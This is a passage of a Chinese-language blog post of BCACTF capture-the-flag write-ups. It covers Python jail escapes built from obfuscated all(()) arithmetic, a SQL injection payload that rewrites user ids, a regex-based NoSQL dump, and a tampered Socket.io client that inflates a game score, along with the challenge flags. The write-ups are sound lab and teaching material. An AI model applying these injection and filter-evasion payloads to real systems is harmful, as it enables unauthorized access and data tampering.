<p>python中，<code>all(()) =&gt; 1</code><br>于是，<code>f = chr(102) = chr((all(())+all(())+all(())+all(())+all(())+all(())+all(())&lt;&lt;all(())+all(())+all(())+all(()))-(all(())+all(())&lt;&lt;all(())+all(()))-all(())-all(()))</code> , <code>g = chr(103) = chr((all(())+all(())+all(())+all(())+all(())+all(()) &lt;&lt; all(())+all(())+all(())+all(()))+all(())+all(()) * all(())+all(())+all(())+all(())+all(()))</code></p>
<p>合并得<code>locals()[chr((all(())+all(())+all(())+all(())+all(())+all(())+all(())&lt;&lt;all(())+all(())+all(())+all(()))-(all(())+all(())&lt;&lt;all(())+all(()))-all(())-all(()))+&quot;la&quot;+ chr((all(())+all(())+all(())+all(())+all(())+all(())+all(())&lt;&lt;all(())+all(())+all(())+all(()))-(all(())+all(())&lt;&lt;all(())+all(()))-all(()))]</code></p>
<p>输入程序得到flag ~ <code>bcactf&#123;PyTH0n_M4st3R_Pr0veD&#125;</code></p>
<h2 id="JailBreak-Revenge"><a href="#JailBreak-Revenge" class="headerlink" title="JailBreak Revenge"></a>JailBreak Revenge</h2><h4 id="描述-7"><a href="#描述-7" class="headerlink" title="描述"></a>描述</h4><p>进阶了一下，过滤了<code>gdvxfiyundmpnetkb/\\&#39;\&quot;~`!@#$%^&amp;*.&#123;&#125;,:;=0123456789#-_|? \t\n\r\x0b\x0c</code></p>
<h4 id="wp-3"><a href="#wp-3" class="headerlink" title="wp"></a>wp</h4><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs py">f=<span class="hljs-built_in">chr</span>(((<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())&lt;&lt;<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(()))+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())))<br>l=<span class="hljs-built_in">chr</span>(((<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())&lt;&lt;<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(()))+((<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(()))&lt;&lt;(<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())))))<br>a=<span class="hljs-built_in">chr</span>(((<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())&lt;&lt;<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(()))+<span class="hljs-built_in">all</span>(())))<br>g=<span class="hljs-built_in">chr</span>(((<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())&lt;&lt;<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(()))+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())))<br><br><span class="hljs-built_in">locals</span>()[<span class="hljs-built_in">chr</span>(((<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())&lt;&lt;<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(()))+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())))+<span class="hljs-built_in">chr</span>(((<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())&lt;&lt;<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(()))+((<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(()))&lt;&lt;(<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())))))+<span class="hljs-built_in">chr</span>(((<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())&lt;&lt;<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(()))+<span class="hljs-built_in">all</span>(())))+<span class="hljs-built_in">chr</span>(((<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())&lt;&lt;<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(()))+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())+<span class="hljs-built_in">all</span>(())))]<br></code></pre></td></tr></table></figure>
<p>flag : <code>bcactf&#123;Wr1tING_pyJaiL5_iS_hArD_f56450aadefcc&#125;</code></p>
<h1 id="webex"><a href="#webex" class="headerlink" title="webex"></a>webex</h1><h2 id="phone-number"><a href="#phone-number" class="headerlink" title="phone-number"></a>phone-number</h2><h4 id="描述-8"><a href="#描述-8" class="headerlink" title="描述"></a>描述</h4><blockquote>
<p>I was trying to sign into this website, but now it’s<br>asking me for a phone number. The way I’m supposed to<br>input it is strange. Can you help me sign in?<br>My phone number is 1234567890</p>
</blockquote>
<p>题目让我们给 1234567890打电话，但是前端无法输入，简单干掉三个限制就可以拿到flag了。</p>
<img src="/2024/07/15/BCACTF-1/phone_number.png" srcset="/img/loading.gif" lazyload class="">
<img src="/2024/07/15/BCACTF-1/phone_number_1.png" srcset="/img/loading.gif" lazyload class="">

<h2 id="“User-1”"><a href="#“User-1”" class="headerlink" title="“User #1”"></a>“User #1”</h2><h4 id="wp-4"><a href="#wp-4" class="headerlink" title="wp"></a>wp</h4><p>进到界面，发现是一个sql注入题，应该是让我们修改自己的id值。<br>先输入双引号进行闭合，得到报错信息<code>unrecognized token: &quot;&quot;1&quot;&quot; WHERE id=1&quot;</code><br>接下来分别构造两个语句，修改admin的id值和自己的id值<br><code>1&quot;,id = 2 WHERE id=0--</code>,<code>1&quot;,id = id-1--</code><br>得到flag<code>bcactf&#123;g3t_BEtA_t3StERs_f6a71451d481a8&#125;</code></p>
<h2 id="NoSQL"><a href="#NoSQL" class="headerlink" title="NoSQL"></a>NoSQL</h2><h4 id="描述-9"><a href="#描述-9" class="headerlink" title="描述"></a>描述</h4><blockquote>
<p>I found this database that does not use SQL,<br>is there any way to break it?</p>
</blockquote>
<h4 id="wp-5"><a href="#wp-5" class="headerlink" title="wp"></a>wp</h4><p>从源码中不难看出，这是一个利用<code>正则表达式</code>来进行检索的数据库。</p>
<p>因此，我们可以构造<code>/?name=.*?</code>来获取所有内容。</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><br>    <span class="hljs-attr">&quot;rtnValues&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span><br>        <span class="hljs-string">&quot;Ricardo Olsen&quot;</span><span class="hljs-punctuation">,</span><br>        <span class="hljs-string">&quot;April Park&quot;</span><span class="hljs-punctuation">,</span><br>        ......<br>        <span class="hljs-string">&quot;Shirley Cannon&quot;</span><span class="hljs-punctuation">,</span><br>        <span class="hljs-string">&quot;Lowell Cochran&quot;</span><span class="hljs-punctuation">,</span><br>        <span class="hljs-string">&quot;Flag Holder&quot;</span><br>    <span class="hljs-punctuation">]</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>发现最后有个<code>Flag Holder</code>，于是我们访问<code>/51/Flag/Holder</code>得到<code>flag</code>。</p>
<h2 id="Sea-Scavenger"><a href="#Sea-Scavenger" class="headerlink" title="Sea Scavenger"></a>Sea Scavenger</h2><h4 id="描述-10"><a href="#描述-10" class="headerlink" title="描述"></a>描述</h4><p>入门题目，灰常简单。</p>
<h2 id="Cookie-Clicker"><a href="#Cookie-Clicker" class="headerlink" title="Cookie Clicker"></a>Cookie Clicker</h2><h4 id="描述-11"><a href="#描述-11" class="headerlink" title="描述"></a>描述</h4><p>给了一个曲奇饼-点击界面，点一下分数+1</p>
<p>查看js代码，看到了这样一串</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">class</span> <span class="hljs-title class_">sendMessage</span> &#123;<br>    power = <span class="hljs-number">1</span><br>    value = <span class="hljs-number">0</span><br>&#125;<br>cookie.<span class="hljs-title function_">addEventListener</span>(<span class="hljs-string">&#x27;click&#x27;</span>, <span class="hljs-keyword">function</span> (<span class="hljs-params">e</span>) &#123;<br>    socket.<span class="hljs-title function_">emit</span>(<span class="hljs-string">&#x27;click&#x27;</span>, <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>(&#123;<span class="hljs-string">&quot;power&quot;</span>:send.<span class="hljs-property">power</span>, <span class="hljs-string">&quot;value&quot;</span>:send.<span class="hljs-property">value</span>&#125;));<br>&#125;);<br></code></pre></td></tr></table></figure>
<p>替换一下内容</p>
<figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs abnf">class sendMessage &#123;<br>    power <span class="hljs-operator">=</span> <span class="hljs-number">1</span>e100<br>    value <span class="hljs-operator">=</span> <span class="hljs-number">1</span>e100<br>&#125;<br></code></pre></td></tr></table></figure>
<p>多次尝试，发现分数跳动但是最终没有改变，怀疑是竞争性条件。</p>
<p>仔细阅读源码</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-comment">// 当收到错误消息时，更新会话的分数，并将分数发送给socket</span><br>socket.<span class="hljs-title function_">on</span>(<span class="hljs-string">&#x27;receivedError&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">msg</span>) =&gt;</span> &#123;<br>    sessions[socket.<span class="hljs-property">id</span>] = errors[socket.<span class="hljs-property">id</span>]<br>    socket.<span class="hljs-title function_">emit</span>(<span class="hljs-string">&#x27;recievedScore&#x27;</span>, <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>(&#123;<span class="hljs-string">&quot;value&quot;</span>:sessions[socket.<span class="hljs-property">id</span>]&#125;));<br>&#125;);<br></code></pre></td></tr></table></figure>
<p>发现只有客户端回复了<code>receivedError</code>，才会更新分数。</p>
<p>故而修改客户端代码如下</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> socket = <span class="hljs-title function_">io</span>();<br><br><span class="hljs-keyword">let</span> cookie = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">querySelector</span>(<span class="hljs-string">&quot;img&quot;</span>)<br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">sendMessage</span> &#123;<br>    power = <span class="hljs-number">1e100</span><br>    value = <span class="hljs-number">1e100</span><br>&#125;<br><br><span class="hljs-keyword">let</span> send = <span class="hljs-keyword">new</span> <span class="hljs-title function_">sendMessage</span>();<br><br>cookie.<span class="hljs-title function_">addEventListener</span>(<span class="hljs-string">&#x27;click&#x27;</span>, <span class="hljs-keyword">function</span> (<span class="hljs-params">e</span>) &#123;<br>    socket.<span class="hljs-title function_">emit</span>(<span class="hljs-string">&#x27;click&#x27;</span>, <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>(&#123;<span class="hljs-string">&quot;power&quot;</span>:send.<span class="hljs-property">power</span>, <span class="hljs-string">&quot;value&quot;</span>:send.<span class="hljs-property">value</span>&#125;));<br>&#125;);<br><br>socket.<span class="hljs-title function_">on</span>(<span class="hljs-string">&#x27;recievedScore&#x27;</span>, <span class="hljs-keyword">function</span> (<span class="hljs-params">msg</span>) &#123;<br>    <span class="hljs-keyword">let</span> scores = <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">parse</span>(msg)<br>    send.<span class="hljs-property">value</span> = scores.<span class="hljs-property">value</span><br>    <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">querySelector</span>(<span class="hljs-string">&quot;.points&quot;</span>).<span class="hljs-property">textContent</span> = scores.<span class="hljs-property">value</span><br>&#125;);<br><br>socket.<span class="hljs-title function_">on</span>(<span class="hljs-string">&#x27;error&#x27;</span>, <span class="hljs-keyword">function</span> (<span class="hljs-params">msg</span>) &#123;<br>    <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;Error&quot;</span>)<br>    socket.<span class="hljs-title function_">emit</span>(<span class="hljs-string">&#x27;receivedError&#x27;</span>, <span class="hljs-string">&quot;recieved&quot;</span>);<br>&#125;);<br></code></pre></td></tr></table></figure>
<p>点击两次，获得flag。<code>bcactf&#123;H0w_Did_Y0u_Cl1ck_S0_M4ny_T1mes_123&#125;</code></p>
<h2 id="Tic-Tac-Toe"><a href="#Tic-Tac-Toe" class="headerlink" title="Tic-Tac-Toe"></a>Tic-Tac-Toe</h2><h4 id="描述-12"><a href="#描述-12" class="headerlink" title="描述"></a>描述</h4><p>井字棋，前后端通信为websocket</p>
<h4 id="wp-6"><a href="#wp-6" class="headerlink" title="wp"></a>wp</h4><p>测试发现，游戏逻辑有漏洞，注释掉这一段即可获取flag。</p>
<img src="/2024/07/15/BCACTF-1/tic-tac-toe.png" srcset="/img/loading.gif" lazyload class="">


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/ctfwp/" class="category-chain-item">ctfwp</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/ctf/" class="print-no-link">#ctf</a>
      
        <a href="/tags/wp/" class="print-no-link">#wp</a>
      
        <a href="/tags/BCACTF/" class="print-no-link">#BCACTF</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>BCACTF-1</div>
      <div>http://xciphand.github.io/2024/07/15/BCACTF-1/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>xciphand</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年7月15日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/07/25/OSCTF-2024/" title="OSCTF_2024">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">OSCTF_2024</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/06/10/BCACTF/" title="BCACTF">
                        <span class="hidden-mobile">BCACTF</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
    <div id="giscus" class="giscus"></div>
    <script type="text/javascript">
      Fluid.utils.loadComments('#giscus', function() {
        var options = {"repo":"xCipHanD/xCipHanD.github.io","repo-id":"R_kgDOKA_8sA","category":"Announcements","category-id":"DIC_kwDOKA_8sM4CcEcM","theme-light":"light","theme-dark":"dark","mapping":"pathname","reactions-enabled":1,"emit-metadata":0,"input-position":"top","lang":"zh-CN"};
        var attributes = {};
        for (let option in options) {
          if (!option.startsWith('theme-')) {
            var key = option.startsWith('data-') ? option : 'data-' + option;
            attributes[key] = options[option];
          }
        }
        var light = 'light';
        var dark = 'dark';
        window.GiscusThemeLight = light;
        window.GiscusThemeDark = dark;
        attributes['data-theme'] = document.documentElement.getAttribute('data-user-color-scheme') === 'dark' ? dark : light;
        for (let attribute in attributes) {
          var value = attributes[attribute];
          if (value === undefined || value === null || value === '') {
            delete attributes[attribute];
          }
        }
        var s = document.createElement('script');
        s.setAttribute('src', 'https://giscus.app/client.js');
        s.setAttribute('crossorigin', 'anonymous');
        for (let attribute in attributes) {
          s.setAttribute(attribute, attributes[attribute]);
        }
        var ss = document.getElementsByTagName('script');
        var e = ss.length > 0 ? ss[ss.length - 1] : document.head || document.documentElement;
        e.parentNode.insertBefore(s, e.nextSibling);
      });
    </script>
    <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
